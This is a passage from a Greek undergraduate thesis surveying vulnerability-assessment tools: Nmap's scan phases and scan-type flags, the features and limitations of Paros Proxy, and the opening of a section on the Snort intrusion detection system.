Page 173: ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ …dsmc.eap.gr/downloads/PLH40-Kalabounia.pdf · ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ. ΔΙΠΛΩΜΑΤΙΚΗ

Καλαμπούνια Μαρία Χριστίνα, “Έλεγχος τρωτότητας δικτυοκεντρικών Πληροφοριακών Συστημάτων ”

173 Ελληνικό Ανοικτό Πανεπιστήμιο: Πτυχιακή Εργασία - HOU-CS-UGP-2010-03

αρχείο κειμένου που περιέχει υπογραφές για κάθε γνωστό ΛΣ. Κατά συνέπεια, εάν η

απάντηση ταιριάζει με οποιαδήποτε από τις καταχωρήσεις στη βάση δεδομένων, μπορεί να

προσδιοριστεί το λειτουργικό σύστημα του απομακρυσμένου υπολογιστή.

Το Nmap μπορεί να εκτελεστεί τόσο μέσα από το γραφικό περιβάλλον του Zenmap όσο και

από τη γραμμή εντολών.

Εικόνα 4.23: Γραμμή εντολών του Nmap

Πηγή: http://nmap.org/

Εικόνα 4.24: Γραφικό περιβάλλον του Nmap

Πηγή: http://nmap.org/

Page 174: ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ …dsmc.eap.gr/downloads/PLH40-Kalabounia.pdf · ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ. ΔΙΠΛΩΜΑΤΙΚΗ

Καλαμπούνια Μαρία Χριστίνα, “Έλεγχος τρωτότητας δικτυοκεντρικών Πληροφοριακών Συστημάτων ”

174 Ελληνικό Ανοικτό Πανεπιστήμιο: Πτυχιακή Εργασία - HOU-CS-UGP-2010-03

Τρόπος λειτουργίας

Η σάρωση με το Nmap πραγματοποιείται σε φάσεις, με την απαίτηση της ολοκλήρωσης της

μιας φάσης πριν την έναρξη της επόμενης. Αναλυτικότερα διακρίνονται οι εξής φάσεις:

• Απαρίθμηση στόχου (Target enumeration): Σε αυτή τη φάση, το Nmap διερευνά τα

χαρακτηριστικά του κόμβου που προσδιορίζονται από το χρήστη, τα οποία μπορεί να

είναι ένας συνδυασμός από ονόματα DNS, IP διευθύνσεις, CIDR επισημάνσεις δικτύου

κλπ, του κόμβου. Αυτή η φάση δεν μπο ρεί να παρακαμφθεί δεδομένου ότι είναι

ουσιαστική για την περαιτέρω ανίχνευση, αλλά μπορεί να απλοποιηθεί η διαδικασία

προσδιορίζοντας IP διευθύνσεις έτσι ώστε να μη χρειαστεί να το κάνει το Nmap.

• Ανακάλυψη κόμβου (Host discovery - ping scanning): Οι ανιχνεύσεις δικτύων

αρχίζουν συνήθως με τον εντοπισμό των στόχων που είναι ενεργοί στο δίκτυο και

χρήζουν περαιτέρω έρευνας. Το Nmap προσφέρει πολλές τεχνικές ανακάλυψης κόμβους,

οι οποίες μπορεί να περιλαμβάνουν από γρήγορα ARP αιτήματα έως επεξεργασμένους

συνδυασμούς TCP, ICMP, και άλλων τύπων προτροπών.

• Αντίστροφο DNS (Reverse-DNS): Μόλις καθορίσει το Nmap ποιους κόμβους θα

ανιχνεύσει, αναζητά τα αντίστροφα-DNS ονόματα όλων των κόμβους για τους οποίους

ανακάλυψε ότι είναι ενεργοί μέσω του ping scan. Μερικές φορές το όνομα ενός κόμβου

παρέχει στοιχεία για τη λειτουργία του τα οποία καθιστούν τις αναφορές πιο

ευανάγνωστες σε σχέση με την εμφάνιση μόνο ΙΡ διευθύνσεων.

• Σάρωση θυρών (Port scanning): Αυτό είναι η κύρια λειτουργία του Nmap. Στέλνονται

πακέτα στους κόμβους και οι απαντήσεις (ή μη) σε αυτά χρησιμοποιούνται για να

ταξινομήσουν τις απομακρυσμένες θύρες σε καταστάσεις όπως ανοικτή, κλειστή, ή

φιλτραρισμένη. Αυτή είναι η βασική διαδικασία την οποία εκτελεί εξ ορισμού το Nmap.

Υπάρχουν πολύ περισσότερες επιλογές που σχετίζονται με τους τύπους σάρωσης, τις

διαμορφώσεις τους και τους αλγορίθμους που χρησιμοποιούνται για την αποδοτικότερη,

ταχύτερη και ακριβέστερη εκτέλεσή τους.

• Ανίχνευση έκδοσης (Version detection): Εάν ανακαλυφθούν ανοιχτές θύρες, το Nmap

ενδεχομένως να μπορεί να καθορίσει ποιο λογισμικό εξυπηρετητή εκτελείται στο

απομακρυσμένο σύστημα. Αυτό επιτυγχάνεται μέσω της αποστολής διαφόρων πακέτων

και της σύγκρισης των απαντήσεων σε μια βάση δεδομένων με χιλιάδες γνωστές

υπογραφές υπηρεσιών.

• Ανίχνευση ΛΣ (OS detection): Τα διαφορετικά λειτουργικά συστήματα υλοποιούν τα

πρότυπα δικτύου με διαφορετικούς τρόπους. Αναλύοντας αυτές τις διαφορές είναι συχνά

πιθανό να καθοριστεί το λειτουργικό σύστημα που εκτελείται στον απομακρυσμένο

κόμβο.

Page 175: ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ …dsmc.eap.gr/downloads/PLH40-Kalabounia.pdf · ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ. ΔΙΠΛΩΜΑΤΙΚΗ

Καλαμπούνια Μαρία Χριστίνα, “Έλεγχος τρωτότητας δικτυοκεντρικών Πληροφοριακών Συστημάτων ”

175 Ελληνικό Ανοικτό Πανεπιστήμιο: Πτυχιακή Εργασία - HOU-CS-UGP-2010-03

• Traceroute. Το Nmap περιέχει μια βελτιστοποιημένη υλοποίηση του μηχανισμού

traceroute, η οποία ενεργοποιείται με την επιλογή --traceroute. Μπορεί να

εντοπίσει τις διαδρομές του δικτύου για πολλούς κόμβους παράλληλα. Το Traceroute

συνήθως περιλαμβάνει έναν ακόμα στάδιο από ανάλυση αντίστροφου DNS για τους

ενδιάμεσους κόμβους.

• Script scanning. Η Nmap Scripting Engine (NSE) χρησιμοποιεί μια συλλογή από scripts

ειδικού σκοπού για την απόκτηση επιπλέον πληροφοριών για το απομακρυσμένο

σύστημα. Η NSE ενισχύεται από τη γλώσσα προγραμματισμού Lua και από μια πρότυπη

βιβλιοθήκη, οι οποίες σχεδιάστηκαν για την απόκτηση δικτυακών πληροφοριών. Μεταξύ

των πλεονεκτημάτων της περιλαμβάνονται η προχωρημένη ανίχνευση έκδοσης, οι

ενημερώσεις για τις ευπάθειες των υπηρεσιών, καθώς επίσης η ανακάλυψη κερκόπορτας

και άλλων ιομορφών. Η NSE δεν εκτελείται εκτός αν τεθεί ως επιλογή στη γραμμή

εντολών.

• Αποτελέσματα (Output). Στο τέλος, το Nmap συλλέγει όλες τις πληροφορίες που έχει

αποκτήσει και τις εμφανίζει ή τις αποθηκεύει σε αρχείο. Το Nmap μπορεί να

αποθηκεύσει τα αποτελέσματα σε διάφορες μορφές. Μεταξύ άλλων το Nmap παρέχει τα

αποτελέσματα σε XML μορφή.

Μέθοδοι Ανίχνευσης

Το Nmap περιλαμβάνει δεκαπέντε ξεχωριστές μεθόδους ανίχνευσης και κάθε μία έχει τα

δικά της χαρακτηριστικά, πλεονεκτήματα και μειονεκτήματα. Κάποιες από αυτές τις

μεθόδους είναι εύκολο να εφαρμοστούν και να δώσουν αποτελέσματα, άλλες είναι

περίπλοκες και απαιτούν επιπρόσθετες πληροφορίες προτού αρχίσει η διαδικασία.

Στον επόμενο πίνακα παρουσιάζονται περιληπτικά οι τεχνικές ανίχνευσης μαζί με τις

εντολές που τις ενεργοποιούν. Επίσης, δείχνει σε ποιες περιπτώσεις είναι απαραίτητα τα

δικαιώματα διαχειριστή, καθώς και πότε υπάρχει η δυνατότητα αναγνώρισης TCP ή UDP

θυρών.

Page 176: ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ …dsmc.eap.gr/downloads/PLH40-Kalabounia.pdf · ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ. ΔΙΠΛΩΜΑΤΙΚΗ

Καλαμπούνια Μαρία Χριστίνα, “Έλεγχος τρωτότητας δικτυοκεντρικών Πληροφοριακών Συστημάτων ”

176 Ελληνικό Ανοικτό Πανεπιστήμιο: Πτυχιακή Εργασία - HOU-CS-UGP-2010-03

Τεχνικές Nmap

Σύνταξη

Γραμμής

Εντολών

Προϋπόθεση

Δικαιωμάτων

Διαχειριστή

Αναγνώριση

TCP

Θυρών

Αναγνώριση

UDP

Θυρών TCP SYN Scan -sS ΝΑΙ ΝΑΙ ΟΧΙ TCP connect() Scan -sT ΟΧΙ ΝΑΙ ΟΧΙ

FIN Scan -sF ΝΑΙ ΝΑΙ ΟΧΙ

Xmas Tree Scan -sX ΝΑΙ ΝΑΙ ΟΧΙ

Null Scan -sN ΝΑΙ ΝΑΙ ΟΧΙ

Ping Scan -sP ΟΧΙ ΟΧΙ ΟΧΙ

Version Detection -sV ΟΧΙ ΟΧΙ ΟΧΙ

UDP Scan -sU ΝΑΙ ΟΧΙ ΝΑΙ

IP Protocol Scan -sO ΝΑΙ ΟΧΙ ΟΧΙ

ACK Scan -sA ΝΑΙ ΝΑΙ ΟΧΙ

Window Scan -sW ΝΑΙ ΝΑΙ ΟΧΙ

RPC Scan -sR ΟΧΙ ΟΧΙ ΟΧΙ

List Scan -sL ΟΧΙ ΟΧΙ ΟΧΙ

Idlescan -sI ΝΑΙ ΝΑΙ ΟΧΙ

FTP Bounce Attack -b ΟΧΙ ΝΑΙ ΟΧΙ

Πίνακας 4-4: Συγκριτική παρουσίαση μεθόδων Nmap

Για περισσότερες πληροφορίες ο αναγνώστης παραπέμπεται στην τεκμηρίωση του

εργαλείου και τη βιβλιογραφία.

Page 177: ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ …dsmc.eap.gr/downloads/PLH40-Kalabounia.pdf · ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ. ΔΙΠΛΩΜΑΤΙΚΗ

Καλαμπούνια Μαρία Χριστίνα, “Έλεγχος τρωτότητας δικτυοκεντρικών Πληροφοριακών Συστημάτων ”

177 Ελληνικό Ανοικτό Πανεπιστήμιο: Πτυχιακή Εργασία - HOU-CS-UGP-2010-03

4.10 Paros Proxy

4.10.1 Ταυτότητα

Το Paros Proxy είναι μια εφαρμογή Man-In-The-Middle γραμμένη σε Java. Διατίθεται

δωρεάν μέσω της σελίδας http://www.parosproxy.org/index.shtml. Ο σχεδιασμός της είναι

τέτοιος, ώστε να επιτρέπει την κατανόηση του τρόπου με τον οποίο οι χρήστες

αλληλεπιδρούν με μια web εφαρμογή και του τρόπου με τον οποίο μπορούν να το

εκμεταλλευτούν αυτό οι επιτιθέμενοι. Αυτό επιτυγχάνεται μέσω της καταγραφής όλων των

δεδομένων HTTP και HTTPS που ανταλλάσσονται μεταξύ του εξυπηρετητή και του

κόμβου, συμπεριλαμβανομένων των cookies και των πεδίων φορμών, τα οποία αφού

υποκλαπούν μπορούν να τροποποιηθούν.

Το Paros Proxy μπορεί να χρησιμοποιηθεί για τον εντοπισμό των παρακάτω ευπαθειών:

• Εύρεση default αρχείων στον web server

• Εμφάνιση φακέλων που περιέχουν παλιά αρχεία, scripts ή αρχείων πηγαίου κώδικα τα

οποία δεν είναι συνήθως προσβάσιμα μέσω κάποιου link της ιστοσελίδας

• Μη σωστή αφαίρεση CRLF (Carriage Return Linefeed) χαρακτήρων η οποία μπορεί να

οδηγήσει σε τροποποίηση των επικεφαλίδων HTTP

• Δυνατότητα εκτέλεσης επιθέσεων Cross – Site Scripting

• Δυνατότητα εκτέλεσης SQL Injection επιθέσεων

• Δυνατότητα αλλοίωσης παραμέτρων (parameter tampering)

• Δυνατότητα προσθήκης αρχείων στο server (server side include)

• Έλεγχος εάν τμήμα ή και ολόκληρα session IDs βρίσκονται εκτεθειμένα σε URLs ή σε

αρχεία καταγραφών (Session ID in URL rewrite)

• Ενεργοποίηση αυτόματης συμπλήρωση κωδικών

• Αποθήκευση ασφαλών ιστοσελίδων

• Ύπαρξη παλιών μη χρησιμοποιούμενων αρχείων (obsolete files) ή αρχείων backup

Μετά την ολοκλήρωση των ελέγχων το εργαλείο δημιουργεί μια αναφορά με τα προβλήματα

που εντόπισε ενώ παράλληλα προτείνει τρόπους αντιμετώπισής τους.

4.10.2 Δυνατότητες Το Paros Proxy διαθέτει τις ακόλουθες δυνατότητες:

Page 178: ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ …dsmc.eap.gr/downloads/PLH40-Kalabounia.pdf · ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ. ΔΙΠΛΩΜΑΤΙΚΗ

Καλαμπούνια Μαρία Χριστίνα, “Έλεγχος τρωτότητας δικτυοκεντρικών Πληροφοριακών Συστημάτων ”

178 Ελληνικό Ανοικτό Πανεπιστήμιο: Πτυχιακή Εργασία - HOU-CS-UGP-2010-03

• Web Spider

Όταν γίνεται μια αίτηση για ένα web site μέσω του φυλλομετρητή, το Paros Proxy

καταγράφει την ιεραρχική του δομή και συλλέγει URL’s, cookies και κρυμμένα στοιχεία

φορμών, ενώ ταυτόχρονα βοηθάει στο να εντοπιστούν links ή αναφορές σελίδων που δεν

είναι ορατές με μια τυχαία επιθεώρηση. Μέσω της λειτουργίας αυτής συλλέγονται URLs

από έναν ιστότοπο σε σύντομο χρονικό διάστημα χωρίς να είναι απαραίτητη η πλοήγηση,

με σκοπό την καλύτερη κατανόηση της ιεραρχίας του, δεδομένου ότι τα αποτελέσματα

παρουσιάζονται σε δενδροειδή μορφή. Κάθε σύνδεσμος που εντοπίζεται προστίθεται στη

δενδρική δομή η οποία αποθηκεύεται για κάθε ιστότοπο χωριστά. Το εργαλείο έχει τη

δυνατότητα να ανακαλύπτει συνδέσμους ακόμα και από ιστότοπους που χρησιμοποιούν

ασφαλείς συνδέσεις HTTPS. Δεν μπορεί να αναγνωρίσει συνδέσμους οι οποίοι είτε έχουν

δημιουργηθεί δυναμικά με χρήση JavaScript, είτε είναι κακώς δομημένοι. Η περιήγηση

όμως στον ιστότοπο μπορεί να προσθέσει στη δενδροειδή μορφή τους συνδέσμους που

έχουν δημιουργηθεί δυναμικά. Τα URLs που συλλέγονται θα χρησιμοποιηθούν στη

συνέχεια για τους υπόλοιπους ελέγχους.

• Αναζήτηση (Search)

Το Paros Proxy έχει ισχυρές ικανότητες αναζήτησης που επιτρέπουν την εύρεση

αιτήσεων cookies, banner ή post σελίδων καθώς και κρυμμένων πεδίων ή σχολίων που

θα έπρεπε να έχουν αφαιρεθεί κατά την διάρκεια της ανάπτυξης της web εφαρμογής.

• Σάρωση (Scan)

Με αυτή τη λειτουργία πραγματοποιείται σάρωση στον εξυπηρετητή με βάση την

ιεραρχική δομή μιας ιστοσελίδας η οποία έχει δημιουργηθεί προηγουμένως με τη

λειτουργία spider. Ελέγχεται αν υπάρχουν αστοχίες στις ρυθμίσεις του εξυπηρετητή ή αν

υπάρχουν backup αρχεία (.bak) τα οποία θα μπορούσαν να αποκαλύψουν πληροφορίες

για αυτόν.

Για τον αυτόματο έλεγχο μιας ιστοσελίδας το Paros Proxy παρέχει έτοιμες πολιτικές scan

σε μορφή plugins, οι οποίες μπορούν να προσαρμοστούν σύμφωνα με τις εκάστοτε

απαιτήσεις. Με τη σάρωση θα ελεγχθεί κάθε URL για κάθε ευπάθεια που έχει καθοριστεί

στην πολιτική. Υπάρχουν 5 κατηγορίες Plugins:

o Information gathering

o Client browser

o Server security

o Miscellaneous

o Injection

Page 179: ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ …dsmc.eap.gr/downloads/PLH40-Kalabounia.pdf · ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ. ΔΙΠΛΩΜΑΤΙΚΗ

Καλαμπούνια Μαρία Χριστίνα, “Έλεγχος τρωτότητας δικτυοκεντρικών Πληροφοριακών Συστημάτων ”

179 Ελληνικό Ανοικτό Πανεπιστήμιο: Πτυχιακή Εργασία - HOU-CS-UGP-2010-03

• Φιλτράρισμα (Filters)

Το φιλτράρισμα είναι μια δυνατότητα του Paros Proxy που μπορεί να χρησιμοποιηθεί για

την αυτόματη τροποποίηση κάποιων στοιχείων που αφορούν σε αιτήματα και απαντήσεις

πο υ ανταλλάσει ο χρήστης με τον εξυπηρετητή. Ο χρήστης έχει τη δυνατό τητα να

αντικαταστήσει την κεφαλίδα ή το σώμα ενός αιτήματος ή μιας απόκρισης όταν

εντοπιστεί ένα συγκεκριμένο μοτίβο σε αυτά, ώστε να μη χρειάζεται να γίνει παγίδευση

σε κάθε HTTP μήνυμα. Για παράδειγμα μπορεί να αντικατασταθεί ένα Fully Qualified

Domain Name (FQDN) όνομα εξυπηρετητή με την ΙΡ διεύθυνση ενός άλλου κόμβου.

Μπορεί ακόμα να αποπροσανατολίσει τον εξυπηρετητή σχετικά με το πιο πρόγραμμα

περιήγησης χρησιμοποιείται με την αλλαγή των μεταβλητών που χρησιμοποιούνται στις

αιτήσεις και αφορούν το πρόγραμμα περιήγησης. Επιπλέον είναι δυνατή η καταγραφή

χρήσιμων πληροφοριών όπως π.χ. cookies.

• Trapping

Το Paros Proxy, ως εφαρμογή Man-In-The-Middle, μπορεί κατόπιν αιτήσεως του χρήστη

να παγιδεύσει αιτήματα και αποκρίσεις που ανταλλάσσονται με κάποιον εξυπηρετητή.

Έτσι μπορεί να γίνει τροποποίηση κάποιων μεταβλητών του μηνύματος.

o Παγίδευση Αιτημάτων: Χρησιμοποιείται για να προσαρμόσει το HTTP POST αίτημα

σε μια μορφή πίνακα για εύκολη επεξεργασία

o Παγίδευση Απαντήσεων: Χρησιμοποιείται για την επεξεργασία του περιεχομένου

στην περιοχή κειμένου Header/Body.

• Recorder

Το Paros μπορεί να διατηρεί ένα πλήρες ιστορικό από όλες τις ΗΤΤΡ αιτήσεις και

απαντήσεις. Αυτό είναι χρήσιμο για τη μεταγενέστερη επανεξέταση όλων των ενεργειών

σε όλες τις σελίδες, μεταβλητών και άλλων στοιχεία που έχουν καταγραφεί. Αποθηκεύει

τα μηνύματα που ανταλλάσσονται μεταξύ του προγράμματος περιήγησης και των

εξυπηρετητών σε ένα ιστορικό με σκοπό την μελλοντική ανάκλησή τους. Επιπλέον είναι

δυνατή η επαναποστολή μηνύματος με τοποθέτηση ετικέτας για τον εύκολο διαχωρισμό

του από τα υπόλοιπα αποθηκευμένα μηνύματα. Στο ιστορικό μπορούν να αποθηκευτούν

μέχρι 2500 αιτήσεις ενώ υπάρχει η δυνατότητα αποθήκευσης επιλεγμένων μηνυμάτων σε

αρχείο κειμένου (.txt).

• Hash calculator

Επειδή μερικές φορές η κωδικοποίηση ή το hashing συγκεκριμένων στοιχείων δεδομένων

που επιστρέφονται είναι εύκολο να εικαστούν, το Paros Proxy μέσω της λειτουργίας

Page 180: ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ …dsmc.eap.gr/downloads/PLH40-Kalabounia.pdf · ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ. ΔΙΠΛΩΜΑΤΙΚΗ

Καλαμπούνια Μαρία Χριστίνα, “Έλεγχος τρωτότητας δικτυοκεντρικών Πληροφοριακών Συστημάτων ”

180 Ελληνικό Ανοικτό Πανεπιστήμιο: Πτυχιακή Εργασία - HOU-CS-UGP-2010-03

calculator μπορεί να τα προσδιορίσει. Το Paros παρέχει ένα γραφικό εργαλείο για τον

υπολογισμό των τιμών SHA-1, MD5 και Base64 για κάθε αυθαίρετο κείμενο που

πληκτρολογείται ή επικολλάται από μια εφαρμογή.

• SSL-buster

Το Paros διερευνά εφαρμογές που απαιτούν πιστοποιητικό SSL από την πλευρά του

client, σε αντίθεση με άλλες αντίστοιχες εφαρμογές, που χειρίζονται πιστοποιητικά SSL

από την πλευρά του εξυπηρετητή.

• Report

Το Paros παρέχει στο χρήστη, μετά την ολοκλήρωση μιας σάρωσης, μια αναφορά σε

μορφή HTML. Τα αποτελέσματα που εμφανίζονται σε αυτή κατηγοριοποιούνται σε:

o High alerts: για SQL injections

o Medium alerts: για directory και browsing cross-site scripting

o Low alerts: για απαρχαιωμένα αρχεία

Για κάθε ευπάθεια που εντοπίζει προτείνει στο χρήστη και την αντίστοιχη λύση για την

αντιμετώπισή της.

4.10.3 Περιορισμοί και παρενέργειες Ως μειονεκτήματα του Paros θα μπορούσαν να αναφερθούν:

• Οι περιορισμένες δυνατότητες αυτοματοποιημένης ανίχνευσης που διαθέτει. Ιδιαίτερα

αξιοσημείωτες είναι οι ελλείψεις ελέγχων για οποιουδήποτε τύπου επιθέσεις command

injection εκτός του Cross-Site Scripting.

• Κατά την διενέργεια ελέγχων για SQL injections, εάν εντοπιστούν ευπάθειες που το

επιτρέπουν, το εργαλείο στην προσπάθειά του να τις επιβεβαιώσει πραγματοποιεί

εισαγωγή μη έγκυρων δεδομένων στη βάση, χωρίς ωστόσο να προκαλεί αλλαγή στη δομή

της βάσης ή διαγραφή οντοτήτων.

• Η λειτουργία spider αν και είναι απλή έχει τους εξής περιορισμούς:

o SSL websites με άκυρα πιστοποιητικά δεν μπορούν να προσπελαστούν

o Δεν υποστηρίζονται πολλαπλά νήματα

o Κακοσχεδιασμένα URL’s σε HTML σελίδες δεν μπορούν να αναγνωριστούν

o URL’s τα οποία δημιουργούνται δυναμικά από javascript δεν μπορούν να βρεθούν.

Ωστόσο, μπορούν να βρεθούν και να προστεθούν στο ιεραρχικό δέντρο μέσω

χειροκίνητης πλοήγησης.

Page 181: ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ …dsmc.eap.gr/downloads/PLH40-Kalabounia.pdf · ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ. ΔΙΠΛΩΜΑΤΙΚΗ

Καλαμπούνια Μαρία Χριστίνα, “Έλεγχος τρωτότητας δικτυοκεντρικών Πληροφοριακών Συστημάτων ”

181 Ελληνικό Ανοικτό Πανεπιστήμιο: Πτυχιακή Εργασία - HOU-CS-UGP-2010-03

• Δεν μπορεί να χαρακτηριστεί ως ένα εργαλείο αυτοματοποιημένου ελέγχου

• Απαιτεί, ως ένα βαθμό, εξειδικευμένες γνώσεις, όπου ένας πεπειραμένος developer

μπορεί να χρησιμοποιήσει χειροκίνητα για να αξιολογήσει τις ευπάθειες μιας web

εφαρμογής.

• Συχνά το Paros Proxy αναγνωρίζεται ως απειλή από διάφορους ιστότοπους, με

αποτέλεσμα να απορρίπτεται η σύνδεση.

• Η χρήση των φίλτρων μπορεί να μειώσει την ταχύτητα του proxy, διότι διακόπτουν και

εξετάζουν κάθε HTTP μήνυμα. Για τον λόγο αυτό θα πρέπει να χρησιμοποιούνται μόνο

όταν κρίνονται απολύτως απαραίτητα.

• Δεν έχει πραγματοποιηθεί καμία ενημέρωση του προγράμματος από τις 8 Αυγούστου του

2006 μέχρι σήμερα και επομένως δεν μπορεί να θεωρηθεί ένα επικαιροποιημένο

εργαλείο.

4.10.4 Αρχιτεκτονική και τρόπος λειτουργίας

Το Paros διαθέτει γραφικό περιβάλλον και είναι γραμμένο στη γλώσσα Java, γι’ αυτό και

απαιτείται στον υπολογιστή που θα εγκατασταθεί να υπάρχει ήδη εγκατεστημένη έκδοση

της Java 1.4 ή νεώτερης. Διατίθεται σε εκδόσεις για Windows, Mac OS X και Unix. Η

αρχιτεκτονική του είναι αυτή ενός Proxy Server. Αφού εγκατασταθεί σε έναν υπολογιστή,

γίνονται οι απαραίτητες ρυθμίσεις στο φυλλομετρητή (π.χ Internet Explorer, Mozilla

Firefox, κλπ) ώστε να συνδέεται με το Paros κάθε φορά που γίνεται μια αίτηση για ένα web

site. Οι ρυθμίσεις στο φυλλομετρητή αφορούν στη δημιουργία μιας proxy σύνδεσης με τον

Paros server. Το Paros, εξορισμού, χρησιμοποιεί την διεύθυνση 127.0.0.1 και ακροάζεται

στην TCP θύρα 8080 για HTTP και 8443 για SSL, χωρίς αυτό να σημαίνει ότι δεν μπορεί να

χρησιμοποιηθεί οποιαδήποτε άλλη θύρα. Επίσης υποστηρίζει proxy chaining.

Αφού γίνουν οι απαραίτητες ρυθμίσεις στο φυλλομετρητή ιστού, κάθε φορά που γίνεται μια

αίτηση για ένα web site σε αυτόν, το Paros σιωπηλά και αυτόματα μέσω της λειτουργίας

spider καταγράφει την ιεραρχική δομή των φακέλων της σελίδας που αιτείται, καθώς και

των μηνυμάτων που ανταλλάσσονται και παρουσιάζει τα αποτελέσματα στο γραφικό του

περιβάλλον, παρέχοντας τη δυνατότητα για αποθήκευση και περαιτέρω ανάλυσή τους. Η

επιτυχία της λειτουργίας spider εξαρτάται από τις απαιτήσεις της εφαρμογής ως προς τα

cookies, headers και authentication.

Page 182: ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ …dsmc.eap.gr/downloads/PLH40-Kalabounia.pdf · ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ. ΔΙΠΛΩΜΑΤΙΚΗ

Καλαμπούνια Μαρία Χριστίνα, “Έλεγχος τρωτότητας δικτυοκεντρικών Πληροφοριακών Συστημάτων ”

182 Ελληνικό Ανοικτό Πανεπιστήμιο: Πτυχιακή Εργασία - HOU-CS-UGP-2010-03

Παρόλο που το Paros παρακολουθεί όλα τα αιτήματα, είτε αυτές χρησιμοποιούν HTTP ή

HTTPS, καταγράφει προεπιλεγμένα μόνο τα cookies και την ιεραρχία της ιστοσελίδας. Εάν

είναι επιθυμητή η καταγραφή και άλλων αιτημάτων της web εφαρμογής παρέχεται η

δυνατότητα για περαιτέρω ρυθμίσεις μέσω του μενού «Εργαλεία», όπου μπορούν να

οριστούν τα φίλτρα, το hash calculator και να γίνει χειροκίνητη επεξεργασία των αιτημάτων.

Εικόνα 4.25: Κεντρική οθόνη λειτουργίας του Paros Proxy

Από το μενού Analyse/Scan Policy επιλέγονται οι τύποι ανιχνεύσεων που είναι επιθυμητό να

εκτελεστούν. Αφού γίνουν αυτές η ρυθμίσεις το Paros είναι πλέον έτοιμο να

πραγματοποιήσει αναζήτηση ευπαθειών σε έναν ή σε όλους τους κόμβους της web

εφαρμογής.

Το Paros παρέχει την δυνατότητα να παγιδεύονται και να τροποποιούνται τα αιτήματα Ιστού

μέσω της καρτέλας Trap, η οποία είναι χωρισμένη σε δύο τμήματα. Το τμήμα Header δείχνει

τις αιτήσεις που έχουν παγιδευτεί όταν το Trap Request είναι ενεργοποιημένο. Αυτό

επιτρέπει την εμφάνιση και την επεξεργασία ολόκληρου του URL και των Headers που θα

σταλούν στον εξυπηρετητή.

Τα αποτελέσματα της ανίχνευσης εμφανίζονται μέσω του μενού Report/Last Scan Report σε

HTML μορφή ή επιλέγοντας την καρτέλα Alerts στο κατώτατο πλαίσιο του παραθύρου του

Paros.

Page 183: ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ …dsmc.eap.gr/downloads/PLH40-Kalabounia.pdf · ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ. ΔΙΠΛΩΜΑΤΙΚΗ

Καλαμπούνια Μαρία Χριστίνα, “Έλεγχος τρωτότητας δικτυοκεντρικών Πληροφοριακών Συστημάτων ”

183 Ελληνικό Ανοικτό Πανεπιστήμιο: Πτυχιακή Εργασία - HOU-CS-UGP-2010-03

Εικόνα 4.26: Αναφορά του Paros Proxy

Για περισσότερες πληροφορίες ο χρήστης παραπέμπεται στο εγχειρίδιο χρήσης του

εργαλείου και στη βιβλιογραφία.

Page 184: ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ …dsmc.eap.gr/downloads/PLH40-Kalabounia.pdf · ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ. ΔΙΠΛΩΜΑΤΙΚΗ

Καλαμπούνια Μαρία Χριστίνα, “Έλεγχος τρωτότητας δικτυοκεντρικών Πληροφοριακών Συστημάτων ”

184 Ελληνικό Ανοικτό Πανεπιστήμιο: Πτυχιακή Εργασία - HOU-CS-UGP-2010-03

4.11 Snort

4.11.1 Ταυτότητα

Το Snort είναι ένα ανοιχτού κώδικα, δωρεάν εργαλείο ανίχνευσης και προστασίας εισβολών

(network intrusion prevention and detection system - IDS/IPS), το οποίο πραγματοποιεί

ανάλυση κυκλοφορίας και καταγραφή πακέτων σε πραγματικό χρόνο, σε δίκτυα ΙΡ. Μπορεί

να διενεργήσει ανάλυση πρωτοκόλλου, αναζήτηση/ταίριασμα περιεχομένου, ενώ μπορεί να

χρησιμοποιηθεί για την ανίχνευση ενός μεγάλου εύρους επιθέσεων και πακέτων όπως buffer

overflows, κρυφές σαρώσεις θυρών, επιθέσεις CGI (Common Gateway Interface),

προτροπών SMB (Server Message Block), προσπάθειες ανίχνευσης λειτουργικού

